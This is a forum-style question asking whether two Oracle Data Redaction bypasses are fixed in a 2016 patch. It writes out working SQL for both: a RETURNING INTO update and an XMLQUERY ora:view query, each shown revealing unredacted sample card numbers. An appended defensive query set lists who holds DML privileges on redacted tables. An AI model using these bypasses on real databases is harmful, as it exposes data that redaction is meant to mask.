REDACTION vulnerabilities. Are they fixed on OR 11.2.0.4 APR 2016 PSU?
Hi all, I wonder if the following vulnerabilities in Oracle Data REDACTION have been fixed, and in which patch set?
Here they are:
1) DML RETURNING INTO and
SQL> SET SERVEROUTPUT ON
SQL> DECLARE
2 buffer varchar(30);
3 BEGIN
4 UPDATE redactiontest
5 SET id = id
6 WHERE id = 1
7 RETURNING cc INTO buffer;
8 DBMS_OUTPUT.put_line('CC=' || buffer);
9 END;
10 /
CC=4111222233334444
2) XMLQUERY() bypasses and
select xmlquery('for $i in ora:view("REDACTIONTEST") return $i'
returning content) from dual;
XMLQUERY('FOR$IINORA:VIEW("REDACTIONTEST")RETURN$I'RETURNINGCONTENT)
---------------------------------------------------------------------------
<ROW><CC>4111222233334444</CC><ID>1</ID></ROW><ROW><CC>3998887776665554</CC
><ID>
3) by allowing a policy to determine whether a redacted column can be referenced in a WHERE clause
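
Added example, not part of the original post: test case 1 above needs DML privilege on the redacted table, so while the patch status is being confirmed, these queries list which grantees could reach that path. They assume access to the DBA_* dictionary views and that redaction policies are recorded in REDACTION_COLUMNS.

```sql
-- Added example (not from the original post). Run with access to the DBA_* views.

-- 1. Object-level DML grants on tables that carry a redacted column.
SELECT rc.object_owner, rc.object_name, rc.column_name,
       tp.grantee, tp.privilege
FROM   redaction_columns rc
JOIN   dba_tab_privs tp
       ON  tp.owner      = rc.object_owner
       AND tp.table_name = rc.object_name
WHERE  tp.privilege IN ('INSERT', 'UPDATE', 'DELETE')
ORDER  BY rc.object_owner, rc.object_name, tp.grantee;

-- 2. System-wide DML privileges, which reach every redacted table.
SELECT grantee, privilege
FROM   dba_sys_privs
WHERE  privilege IN ('INSERT ANY TABLE', 'UPDATE ANY TABLE', 'DELETE ANY TABLE')
ORDER  BY grantee, privilege;

-- 3. Where a grantee from (1) is a role, walk the role grants down to
--    every user or role that inherits it.
SELECT DISTINCT CONNECT_BY_ROOT rp.granted_role AS via_role,
       rp.grantee
FROM   dba_role_privs rp
START  WITH rp.granted_role IN (
         SELECT tp.grantee
         FROM   redaction_columns rc
         JOIN   dba_tab_privs tp
                ON  tp.owner      = rc.object_owner
                AND tp.table_name = rc.object_name
         WHERE  tp.privilege IN ('INSERT', 'UPDATE', 'DELETE'))
CONNECT BY PRIOR rp.grantee = rp.granted_role
ORDER  BY 1, 2;
```

The XMLQUERY case in item 2 is a query rather than DML, so this listing does not scope it.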